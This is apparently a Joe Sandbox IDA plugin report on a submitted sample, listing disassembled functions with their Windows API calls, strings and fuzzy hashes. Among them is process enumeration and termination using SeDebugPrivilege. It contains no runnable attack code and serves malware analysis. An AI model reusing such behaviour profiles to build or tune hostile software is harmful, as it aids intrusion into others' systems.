Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 92f7469686f91c59cc468c41e3d7541a226fa20410eb8bfaa365c5218ac4dbba
Instruction ID: 7f0b46ae4422f7678f9976150ad1c64eb0d229555e440508f23505157cc5521e
Opcode Fuzzy Hash: 92f7469686f91c59cc468c41e3d7541a226fa20410eb8bfaa365c5218ac4dbba
Instruction Fuzzy Hash: 2FE19E316043429FCB14EF24C891A7ABBE1EF84354F1489ADF8999B2B2DB31DD45CB52

Function 00B74F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B748AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B738D3,?), ref: 00B748C7

Part of subcall function 00B748AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B738D3,?), ref: 00B748E0

Part of subcall function 00B74CD3: GetFileAttributesW.KERNEL32(?,00B73947), ref: 00B74CD4

lstrcmpiW.KERNEL32(?,?), ref: 00B74FE2
_wcscmp.LIBCMT ref: 00B74FFC
MoveFileW.KERNEL32(?,?), ref: 00B75017

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 835a214c6fbd1e79a8fc2fc5d3cfe1c242442f160370b0006ede608d297e9cf7
Instruction ID: 9adf6c04700ccfef2609e85ce2a5b8b555c49b6de58369b6b9781ad5c0429460
Opcode Fuzzy Hash: 835a214c6fbd1e79a8fc2fc5d3cfe1c242442f160370b0006ede608d297e9cf7
Instruction Fuzzy Hash: F851A3B250C7859BC720DB60C8819DFB3ECEF84301F50496EF199D7191EF74A2888766

Function 00B988B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B9896E

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 684e5986ea0846c295c72d8933860e6020614cfeb729781213659184ead13ad1
Instruction ID: bd5bbc2de8f96f13ff9dc52c02459180ca95336fce01244bde235d82d7f0f7dc
Opcode Fuzzy Hash: 684e5986ea0846c295c72d8933860e6020614cfeb729781213659184ead13ad1
Instruction Fuzzy Hash: 34518370600209BFDF209F28DCC5BA97BE5FB06360F6041B6F915E61A1DF71A990DBA1

Function 00B12B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00B4C547
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B4C569
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B4C581
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00B4C59F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B4C5C0
DestroyIcon.USER32(00000000), ref: 00B4C5CF
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B4C5EC
DestroyIcon.USER32(?), ref: 00B4C5FB

Part of subcall function 00B9A71E: DeleteObject.GDI32(00000000), ref: 00B9A757

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 79a97d74306fcb73901f31006d15429b85104f3813d7bff2d548b359adacc20e
Instruction ID: 79a7d4c940061b5d466ee4eca84342e40e9fff8aba5df048e7ebbd8d03cf22ec
Opcode Fuzzy Hash: 79a97d74306fcb73901f31006d15429b85104f3813d7bff2d548b359adacc20e
Instruction Fuzzy Hash: BD517C74601209AFDB24DF24CC85FAA7BF5EB54720F5045A9F902D72A0DB74EDA0EB50

Function 00B68E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00B68A84,00000B00,?,?), ref: 00B68E0C
HeapAlloc.KERNEL32(00000000,?,00B68A84,00000B00,?,?), ref: 00B68E13
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B68A84,00000B00,?,?), ref: 00B68E28
GetCurrentProcess.KERNEL32(?,00000000,?,00B68A84,00000B00,?,?), ref: 00B68E30
DuplicateHandle.KERNEL32(00000000,?,00B68A84,00000B00,?,?), ref: 00B68E33
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00B68A84,00000B00,?,?), ref: 00B68E43
GetCurrentProcess.KERNEL32(00B68A84,00000000,?,00B68A84,00000B00,?,?), ref: 00B68E4B
DuplicateHandle.KERNEL32(00000000,?,00B68A84,00000B00,?,?), ref: 00B68E4E
CreateThread.KERNEL32(00000000,00000000,00B68E74,00000000,00000000,00000000), ref: 00B68E68

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 07a3105cfe1eac2acb5bf12cc9798a32c6db44566e1ec049da79bba8d30266b5
Instruction ID: a6982fb0d53a042ee6e949c3e06f7ff8c6af8544a95e2c8679548c96e101b4f4
Opcode Fuzzy Hash: 07a3105cfe1eac2acb5bf12cc9798a32c6db44566e1ec049da79bba8d30266b5
Instruction Fuzzy Hash: 5601BBB5240309FFEB10ABA5DD4DF6B3BACEB89721F104422FA05DB1A1CA759800CB64

Function 00B89428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B8947C
VariantInit.OLEAUT32(?), ref: 00B8954D
VariantInit.OLEAUT32(?), ref: 00B8964E
VariantClear.OLEAUT32(?), ref: 00B89658
VariantClear.OLEAUT32(?), ref: 00B896B5

Strings

Null Object assignment in FOR..IN loop, xrefs: 00B894DD, 00B8960B, 00B896C3
Incorrect Object type in FOR..IN loop, xrefs: 00B89631

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: bfdea7ae6a7702af4eb7c2338a131dda6b4b3ec236711f16f1eb0ea3fd4b872e
Instruction ID: 0a7a255d23fa4d0d27e1619dbe83b4638eb6cd005db0321f6c846205f07d584b
Opcode Fuzzy Hash: bfdea7ae6a7702af4eb7c2338a131dda6b4b3ec236711f16f1eb0ea3fd4b872e
Instruction Fuzzy Hash: 6191B071A00219ABDF24EFA5C884FBEB7F8EF45714F188199F515AB2A0D7709905CFA0

Function 00B89A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00B67652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B6758C,80070057,?,?,?,00B6799D), ref: 00B6766F
Part of subcall function 00B67652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B6758C,80070057,?,?), ref: 00B6768A
Part of subcall function 00B67652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B6758C,80070057,?,?), ref: 00B67698
Part of subcall function 00B67652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B6758C,80070057,?), ref: 00B676A8

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00B89B1B
_memset.LIBCMT ref: 00B89B28
_memset.LIBCMT ref: 00B89C6B
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00B89C97
CoTaskMemFree.OLE32(?), ref: 00B89CA2

Strings

NULL Pointer assignment, xrefs: 00B89CF0

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 0e184a1941568b2f4b6b7f53e8212ba609450bc27994a408ffa53109cdde65da
Instruction ID: b1299db5a89aa95d49123ead473807971b85aa96c9186cc8bfdef1629011c57d
Opcode Fuzzy Hash: 0e184a1941568b2f4b6b7f53e8212ba609450bc27994a408ffa53109cdde65da
Instruction Fuzzy Hash: 04911871D00219EBDF10DFA4DC85AEEBBF9EF08710F2441AAE519A7291DB715A44CFA0

Function 00B96FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B97093
SendMessageW.USER32(?,00001036,00000000,?), ref: 00B970A7
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B970C1
_wcscat.LIBCMT ref: 00B9711C
SendMessageW.USER32(?,00001057,00000000,?), ref: 00B97133
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B97161

Strings

SysListView32, xrefs: 00B97065

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: ee175df8ab62feb674155b5640d523976453990f9d8a843ebc3734136774d42a
Instruction ID: e5c9dea649885691679ef35b819466f07f60c7807e007f5ab2d3800042d75f25
Opcode Fuzzy Hash: ee175df8ab62feb674155b5640d523976453990f9d8a843ebc3734136774d42a
Instruction Fuzzy Hash: 77418171A54309ABDF219F64CC85BEE77E8EF08350F1045BAF944E7291DA729D848B60

Function 00B8EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00B73E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00B73EB6
Part of subcall function 00B73E91: Process32FirstW.KERNEL32(00000000,?), ref: 00B73EC4
Part of subcall function 00B73E91: CloseHandle.KERNEL32(00000000), ref: 00B73F8E

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B8ECB8
GetLastError.KERNEL32 ref: 00B8ECCB
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B8ECFA
TerminateProcess.KERNEL32(00000000,00000000), ref: 00B8ED77
GetLastError.KERNEL32(00000000), ref: 00B8ED82
CloseHandle.KERNEL32(00000000), ref: 00B8EDB7

Strings

SeDebugPrivilege, xrefs: 00B8ECD6

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: fd548e2a6bcffd1a9b9fd315845c42cbf9011055746ae80724a7ec2fde48e588
Instruction ID: 6f5b8861540c03dae0713b8b87418363e3138cb0cfc7d8b085fbade890f3a09d
Opcode Fuzzy Hash: fd548e2a6bcffd1a9b9fd315845c42cbf9011055746ae80724a7ec2fde48e588
Instruction Fuzzy Hash: D041A9712042019FDB14EF24CC95F7EB7E1AF80714F0880A9F8569B2D2DB78E808CB96

Function 00B73226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00B732C5

Strings

warning, xrefs: 00B732AE
info, xrefs: 00B73266
stop, xrefs: 00B73296
question, xrefs: 00B7327E
blank, xrefs: 00B73247

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: c2c9d7d094a94d16b880c1e839a6e2c0f34d6e4d2af107a5d0cce3701bcb5567
Instruction ID: f100e4d1195e9fddcadd19c7fe2e17957acfb771fe8b8bc01fd89cfd676cec92
Opcode Fuzzy Hash: c2c9d7d094a94d16b880c1e839a6e2c0f34d6e4d2af107a5d0cce3701bcb5567
Instruction Fuzzy Hash: 5C11573124835ABEA7015A54DC82DABB3DCDF09B74F2040EAF918B62C3E6715F4016A5

Function 00B74534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00B7454E
LoadStringW.USER32(00000000), ref: 00B74555
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B7456B
LoadStringW.USER32(00000000), ref: 00B74572
_wprintf.LIBCMT ref: 00B74598
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B745B6

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00B74593

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 4e4c0d711c8a7e25455e26f7af2db39d8d61f884c629808a1c2fd477c034436e
Instruction ID: 3ec56d52ee4197bd1523b8abe8ce2c17f2f4878b1495017f28926f2cb929d14f
Opcode Fuzzy Hash: 4e4c0d711c8a7e25455e26f7af2db39d8d61f884c629808a1c2fd477c034436e
Instruction Fuzzy Hash: 73014FF3904219BFE710A7A09E89EF777ACD708711F0045A6BB49E3051EB749E858B70

Function 00B9D74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B12612: GetWindowLongW.USER32(?,000000EB), ref: 00B12623

GetSystemMetrics.USER32(0000000F), ref: 00B9D78A
GetSystemMetrics.USER32(0000000F), ref: 00B9D7AA
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00B9D9E5
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00B9DA03
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00B9DA24
ShowWindow.USER32(00000003,00000000), ref: 00B9DA43
InvalidateRect.USER32(?,00000000,00000001), ref: 00B9DA68
DefDlgProcW.USER32(?,00000005,?,?), ref: 00B9DA8B

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: cb4878ea823d92f3a6a742907c7781ce8d694cb87f1e34c062810541488b6864
Instruction ID: a4fb91f03715b03f735ba47d950759705fec2e13509e249a2747dda53fa60688
Opcode Fuzzy Hash: cb4878ea823d92f3a6a742907c7781ce8d694cb87f1e34c062810541488b6864
Instruction Fuzzy Hash: 68B16775600226ABDF14CF6AC9C57B97BF1FF04711F0880BAED489B295DB34A960CB60

Function 00B12A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00B4C417,00000004,00000000,00000000,00000000), ref: 00B12ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00B4C417,00000004,00000000,00000000,00000000,000000FF), ref: 00B12B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00B4C417,00000004,00000000,00000000,00000000), ref: 00B4C46A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00B4C417,00000004,00000000,00000000,00000000), ref: 00B4C4D6

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 2851bba249e47b473b48200c790c112c3da0c01a8dd5c5367ef962f806e3531c
Instruction ID: 882c2e111dffb7cb9c566617c2b8b68465bfe0c116638493065df71ca2c8b02c
Opcode Fuzzy Hash: 2851bba249e47b473b48200c790c112c3da0c01a8dd5c5367ef962f806e3531c
Instruction Fuzzy Hash: 284129312187809AC7398B288DD8BFB7FD2EF45310F9484EEE04787660DA35A9E1D720

Function 00B77368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00B7737F

Part of subcall function 00B30FF6: std::exception::exception.LIBCMT ref: 00B3102C
Part of subcall function 00B30FF6: __CxxThrowException@8.LIBCMT ref: 00B31041

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00B773B6
EnterCriticalSection.KERNEL32(?), ref: 00B773D2
_memmove.LIBCMT ref: 00B77420
_memmove.LIBCMT ref: 00B7743D
LeaveCriticalSection.KERNEL32(?), ref: 00B7744C
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00B77461
InterlockedExchange.KERNEL32(?,000001F6), ref: 00B77480

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: e097e5de51be3e255e15f3af40e77b002c95ea9c64f8ca60a6df362788d26312
Instruction ID: 8641cfebaa574090cd277a9270ed8b23bd5da2181b6b4e655a14246db2a8e0a1
Opcode Fuzzy Hash: e097e5de51be3e255e15f3af40e77b002c95ea9c64f8ca60a6df362788d26312
Instruction Fuzzy Hash: 28316131904205EBDF10EF54DD85EAE7BB8EF44710F2481A6F904EB256DF309A14DBA4

Function 00B96442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00B9645A
GetDC.USER32(00000000), ref: 00B96462
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B9646D
ReleaseDC.USER32(00000000,00000000), ref: 00B96479
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00B964B5
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B964C6
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B99299,?,?,000000FF,00000000,?,000000FF,?), ref: 00B96500
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B96520

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 34c2b55e87b9673bdfae448ae0fbe1ebfe92df8ee8907b103ef2bfbb16a1ab1a
Instruction ID: 83bde50cbe30b56ce6ec445ed9dc13fbe82b2442a2c41bff800ac4f1607ca3a0
Opcode Fuzzy Hash: 34c2b55e87b9673bdfae448ae0fbe1ebfe92df8ee8907b103ef2bfbb16a1ab1a
Instruction Fuzzy Hash: C7317C72200214AFEF108F50CD8AFFA3BA9EB19761F044066FE08DA295CA759851CB60

Function 00B6C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00B6C087
_memcmp.LIBCMT ref: 00B6C0A9
_memcmp.LIBCMT ref: 00B6C0C1
_memcmp.LIBCMT ref: 00B6C0D4
_memcmp.LIBCMT ref: 00B6C0EE
_memcmp.LIBCMT ref: 00B6C101
_memcmp.LIBCMT ref: 00B6C119
_memcmp.LIBCMT ref: 00B6C134

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
